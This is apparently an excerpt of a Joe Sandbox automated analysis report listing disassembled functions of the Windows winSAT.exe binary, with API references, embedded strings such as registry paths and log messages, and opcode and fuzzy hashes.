                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Event$EnabledErrorHandleLastModule$CloseCountCreateCurrentHeadInitializeListProcessTick_aligned_malloc_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: A value other than 0 or 1 found in CCCSupportDisabled, using default value of %d for CCC Enabled$CCC Support disabled in registry$CCC Support not disabled in registry$CCCSupportDisabled$PermittedBGInterference$base\winsat\storage\diskprof.cpp
                                                                                                                                                                                              • API String ID: 2006971136-2743305029
                                                                                                                                                                                              • Opcode ID: 5d9e96d786cdde3160fa6515eb207fe637a6f7539245895db55d2c5df59a6d53
                                                                                                                                                                                              • Instruction ID: 974830ffcbaefb66db78ea5ca0fa5caf51bd6b51319a2ecd4308222a8b9d9696
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d9e96d786cdde3160fa6515eb207fe637a6f7539245895db55d2c5df59a6d53
                                                                                                                                                                                              • Instruction Fuzzy Hash: 68A19C32A09B82A6E704EF64E8802EDB7B4FB44744FA08135DB9D53BA5DF78E565C310
                                                                                                                                                                                              Function 00007FF780F975CC Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 175COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32 ref: 00007FF780F97673
                                                                                                                                                                                              • _CxxThrowException.MSVCRT ref: 00007FF780F9788C
                                                                                                                                                                                              • _CxxThrowException.MSVCRT ref: 00007FF780F978A3
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: EventEnabled.ADVAPI32 ref: 00007FF780FCE41F
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: GetCurrentProcessId.KERNEL32 ref: 00007FF780FCE440
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: GetTickCount.KERNEL32 ref: 00007FF780FCE459
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: _snprintf_s.MSVCRT ref: 00007FF780FCE48C
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: _vsnprintf_s.MSVCRT ref: 00007FF780FCE4DB
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: EventEnabled.ADVAPI32 ref: 00007FF780FCE500
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: GetModuleHandleW.KERNEL32(?,?,00000001,00007FF780F94E15), ref: 00007FF780FDC71A
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: FindResourceW.KERNEL32 ref: 00007FF780FDC79D
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: SizeofResource.KERNEL32 ref: 00007FF780FDC7BE
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: LoadResource.KERNEL32 ref: 00007FF780FDC7D8
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: LockResource.KERNEL32 ref: 00007FF780FDC7F0
                                                                                                                                                                                                • Part of subcall function 00007FF780FA9C0C: __uncaught_exception.MSVCRT ref: 00007FF780FA9DE6
                                                                                                                                                                                                • Part of subcall function 00007FF780FA2944: __uncaught_exception.MSVCRT ref: 00007FF780FA2A2B
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Resource$EnabledEventExceptionHandleModuleThrow__uncaught_exception$CountCurrentFindLoadLockProcessSizeofTick_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: $ERROR: %#08X mlib::XmlDOM::LoadDocument(schema) failed.$ERROR: %#08X mmlib::XmlDOM::ValidateXml failed.$WinsatSchema.xsd$base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 851945222-1334996330
                                                                                                                                                                                              • Opcode ID: e974353996baf7abc9ee3d21b4f982a81b0cb45095a688f02e692004243fb957
                                                                                                                                                                                              • Instruction ID: ec107684a6a49dcaf29914ed3495431664f7bafea8688761f9b5d81676c66fd8
                                                                                                                                                                                              • Opcode Fuzzy Hash: e974353996baf7abc9ee3d21b4f982a81b0cb45095a688f02e692004243fb957
                                                                                                                                                                                              • Instruction Fuzzy Hash: 56715D21B0DB8291EB20BB25E8503F9A360FF85B54FA09131DA4D477E6DF6CE549C760
                                                                                                                                                                                              Function 00007FF780F9720C Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 159COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: HandleModule$CountTick
                                                                                                                                                                                              • String ID: CompletionStatus$WinSAT$description
                                                                                                                                                                                              • API String ID: 1594003039-2016456358
                                                                                                                                                                                              • Opcode ID: d3388c115b3c1ff29f845f66b3e0dd4b5b56ef891dd71bf8c4f90752bf17cf75
                                                                                                                                                                                              • Instruction ID: 94d754608bd715a408d8b90e5768478b94e16cc56051f3b6c68f582d24858300
                                                                                                                                                                                              • Opcode Fuzzy Hash: d3388c115b3c1ff29f845f66b3e0dd4b5b56ef891dd71bf8c4f90752bf17cf75
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E715C32B09B0199EB00EB65D8401EC77B1FF44358FA4A236EA0E47799DF78E956C350
                                                                                                                                                                                              Function 00007FF780FD5EFC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00007FF780FD5E28: SHGetFolderPathW.SHELL32 ref: 00007FF780FD5E70
                                                                                                                                                                                              • CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000400,00000000), ref: 00007FF780FD5F94
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000400,00000000), ref: 00007FF780FD5FAE
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateErrorFileFolderLastPath
                                                                                                                                                                                              • String ID: \\.\%C:
                                                                                                                                                                                              • API String ID: 3540804360-3735155761
                                                                                                                                                                                              • Opcode ID: f8652b6484cb92c39ac9eb9d60ddf74802a27dfeba21ddf5c9b8609b6652f1f3
                                                                                                                                                                                              • Instruction ID: 59d67a1d8d78af5978451e9243fbfd6e99a08d43c3b7655ee8564adc6908bf1b
                                                                                                                                                                                              • Opcode Fuzzy Hash: f8652b6484cb92c39ac9eb9d60ddf74802a27dfeba21ddf5c9b8609b6652f1f3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D51823260CB4186E710AB159448279B7A1FB89BB0FA08331EE6E47BE5DF7DE446C710
                                                                                                                                                                                              Function 00007FF780FAAD80 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 108COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception$memcpy
                                                                                                                                                                                              • String ID: first not in the string$last < first
                                                                                                                                                                                              • API String ID: 3934552184-3835420288
                                                                                                                                                                                              • Opcode ID: b0665a3dbc11ef86ca28703add317f790ba15fc716790e28f944540be1427348
                                                                                                                                                                                              • Instruction ID: b58d570f4dd7697d12b2361ec8474ca956e3c3acdbf691729cf9973e7eca41f9
                                                                                                                                                                                              • Opcode Fuzzy Hash: b0665a3dbc11ef86ca28703add317f790ba15fc716790e28f944540be1427348
                                                                                                                                                                                              • Instruction Fuzzy Hash: 59417462B1C94690EB10FB16D8517A9A321BF91BD4FE0A031DA4D077E5DE6CE549C720
                                                                                                                                                                                              Function 00007FF780FE2160 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 104COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: base\winsat\mlib\mxmldom.cpp$cannot allocate memory for a string$cannot select a XML node for from an XPATH expression
                                                                                                                                                                                              • API String ID: 0-3702432899
                                                                                                                                                                                              • Opcode ID: d94cbd553a10ff1c05e60ac3726e5db9ac612ee0d3a6121a0b24726060f02239
                                                                                                                                                                                              • Instruction ID: 69b73398c3c474920eaab767ea1a304ff20437e636d9d00321dd627c27d77167
                                                                                                                                                                                              • Opcode Fuzzy Hash: d94cbd553a10ff1c05e60ac3726e5db9ac612ee0d3a6121a0b24726060f02239
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E419E72608B46C2FB54AB25E884379A760FB89BA5FA48235CA1E4B7E0DF7CD445C710
                                                                                                                                                                                              Function 00007FF780F94670 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 91threadCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseCurrentHandlePriorityThread$ClassErrorLastProcess
                                                                                                                                                                                              • String ID: d
                                                                                                                                                                                              • API String ID: 3412941295-2564639436
                                                                                                                                                                                              • Opcode ID: b9ad9cc67e2881c4ffed7b9d042a40d97c1c70f0ebcb925821ca7b282893384f
                                                                                                                                                                                              • Instruction ID: c55d6a7969237d70417abf76801500a10e1fc96592e4a1b26c5d51ebe53505d3
                                                                                                                                                                                              • Opcode Fuzzy Hash: b9ad9cc67e2881c4ffed7b9d042a40d97c1c70f0ebcb925821ca7b282893384f
                                                                                                                                                                                              • Instruction Fuzzy Hash: F4415377519B84CAE7009F25E4482ADBB61F745F58FA88239CF4E07399CF38A444CB65
                                                                                                                                                                                              Function 00007FF780F9A56C Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 73registryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Value$CloseCreateFlushQuery
                                                                                                                                                                                              • String ID: ?$MOOBE$SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinSAT
                                                                                                                                                                                              • API String ID: 1909893835-1736852685
                                                                                                                                                                                              • Opcode ID: 17253a89807667cdd36924cbdf5125b560f7e5394f8c3c3f77df63d1cc7372d5
                                                                                                                                                                                              • Instruction ID: 86f856a926849179321d173720432ea47bfb0138fed6711581989ad2d4ef4828
                                                                                                                                                                                              • Opcode Fuzzy Hash: 17253a89807667cdd36924cbdf5125b560f7e5394f8c3c3f77df63d1cc7372d5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 61315432A08A41CBE7609F20E8447B9BBA4F78876CFA55131EA4D42B58DF7CD585CB50
                                                                                                                                                                                              Function 00007FF780FD55E0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 68timeCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$TimerWaitable
                                                                                                                                                                                              • String ID: Cannot set the assessment watch dog timer$Dying - Cannot set the assessment watch dog timer$Dying - Invalid value for short watch dog timer$Invalid value for short watch dog timer$base\winsat\exe\watchdog.cpp
                                                                                                                                                                                              • API String ID: 627813652-3218367002
                                                                                                                                                                                              • Opcode ID: a9f309908c350da5e646e4d223a96f7f63b0c43e5216d6ecf335d1363b53af3d
                                                                                                                                                                                              • Instruction ID: f4e959a973c1e3d5678e53013629b40727cb311acd39378b3092c063c50c2e98
                                                                                                                                                                                              • Opcode Fuzzy Hash: a9f309908c350da5e646e4d223a96f7f63b0c43e5216d6ecf335d1363b53af3d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C213821E1C94782E754BB60E8697B9E760BF81745FF08232D80E426A1DFBDF406CB21
                                                                                                                                                                                              Function 00007FF780F9AC6C Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 49registryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: EnabledEvent$CloseCountCreateCurrentFlushProcessTickValue_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: ?$ERROR: could not create %ws reg key. error = %u$SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinSAT$base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 2380191356-345777767
                                                                                                                                                                                              • Opcode ID: 2123ee1d3b54ccaafa7b3b99ee88ea041357c1a574fe6db0f8d82ab7cca43dd7
                                                                                                                                                                                              • Instruction ID: 48c3b1c662815c9d070eedbd9558d6afb250ba78017f1c1dabb4f4bd92c312e2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2123ee1d3b54ccaafa7b3b99ee88ea041357c1a574fe6db0f8d82ab7cca43dd7
                                                                                                                                                                                              • Instruction Fuzzy Hash: E7214A32618B4187EB109F20E84477ABBA4FB89BA4FA14231DA9D47764CF7CD589CB14
                                                                                                                                                                                              Function 00007FF780FC6060 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 30COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: fwprintf
                                                                                                                                                                                              • String ID: <ProgrammaticName>%ws</ProgrammaticName>$ <Value>%lld</Value>$ </MetricValue>$ <MetricValue>
                                                                                                                                                                                              • API String ID: 968622242-1868502295
                                                                                                                                                                                              • Opcode ID: c10b7d38776a473ee28b68158cf4e1dcf868e2ac7480662c3b599e2f6d25e355
                                                                                                                                                                                              • Instruction ID: e41197b4f5eac8d43606cdaf13b6521d5d1783d6716842739d89656653a2c0db
                                                                                                                                                                                              • Opcode Fuzzy Hash: c10b7d38776a473ee28b68158cf4e1dcf868e2ac7480662c3b599e2f6d25e355
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7BF0DA31A08B86C6E7105B15F840069EB60FF49FD1BE59170DA0907718DFB8D145CB10
                                                                                                                                                                                              Function 00007FF780F94844 Relevance: 13.8, APIs: 1, Strings: 8, Instructions: 315COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: EnterCriticalSection.KERNEL32 ref: 00007FF780FDC9DB
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: LeaveCriticalSection.KERNEL32 ref: 00007FF780FDCA0D
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: vswprintf_s.MSVCRT ref: 00007FF780FDCA34
                                                                                                                                                                                              • _CxxThrowException.MSVCRT ref: 00007FF780F94D24
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: GetModuleHandleW.KERNEL32(?,?,00000001,00007FF780F94E15), ref: 00007FF780FDC71A
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: FindResourceW.KERNEL32 ref: 00007FF780FDC79D
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: SizeofResource.KERNEL32 ref: 00007FF780FDC7BE
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: LoadResource.KERNEL32 ref: 00007FF780FDC7D8
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: LockResource.KERNEL32 ref: 00007FF780FDC7F0
                                                                                                                                                                                                • Part of subcall function 00007FF780FA9C0C: __uncaught_exception.MSVCRT ref: 00007FF780FA9DE6
                                                                                                                                                                                                • Part of subcall function 00007FF780FA2944: __uncaught_exception.MSVCRT ref: 00007FF780FA2A2B
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Resource$CriticalSection__uncaught_exception$EnterExceptionFindHandleLeaveLoadLockModuleSizeofThrow_wtofiswdigitvswprintf_s
                                                                                                                                                                                              • String ID: base\winsat\exe\WinSATOp.h$cached$forever$justcores$maxt$mint$notnice$uncached
                                                                                                                                                                                              • API String ID: 493481623-792068495
                                                                                                                                                                                              • Opcode ID: 45677b5c72cd49136a876fcfbf08342032e959517ced32fe4e19bad8488d563a
                                                                                                                                                                                              • Instruction ID: b930f3c1c48f4f0e233274c5ea0a0a3eaa593338b95244bbd89a2c37d2746430
                                                                                                                                                                                              • Opcode Fuzzy Hash: 45677b5c72cd49136a876fcfbf08342032e959517ced32fe4e19bad8488d563a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 28D1B122A0CA829AEB14FF21C4101E9A761FF51798FA09132DA0D47BD6DF2DF566C360
                                                                                                                                                                                              Function 00007FF780FA392C Relevance: 13.7, APIs: 9, Instructions: 232sleepCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ByteCharErrorLastMultiWide$Sleep
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3672326914-0
                                                                                                                                                                                              • Opcode ID: 28a9832999819af3201d97c93aa3843ee96b6fb6fe0125b4f0448d58416e171a
                                                                                                                                                                                              • Instruction ID: edba17a6d0c3cb0d124f39ceb8d755e4f71b2430109c5f94d471cf152c4d74dd
                                                                                                                                                                                              • Opcode Fuzzy Hash: 28a9832999819af3201d97c93aa3843ee96b6fb6fe0125b4f0448d58416e171a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 92B18D36608B8586EB50EF26D4413ADB7A0FB89F98FA49132DE4D47798CF38E454C720
                                                                                                                                                                                              Function 00007FF780FCDEF0 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 152COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CountInfoStringSystemTickType
                                                                                                                                                                                              • String ID: ERROR Cannot enable logging becuase the the WinSAT directory cannot be determined$ERROR: Cannot start ETW tracing; %s$WinSATSession%u$\DataStore\%04d-%02d-%02d %02d.%02d.%06.3f.winsat.etl$base\winsat\exe\logging.cpp
                                                                                                                                                                                              • API String ID: 2047934861-2951745245
                                                                                                                                                                                              • Opcode ID: d16b25315d6b87577e5c7b26a4137971e0f7868615d898ce74960aaa2d60d9e7
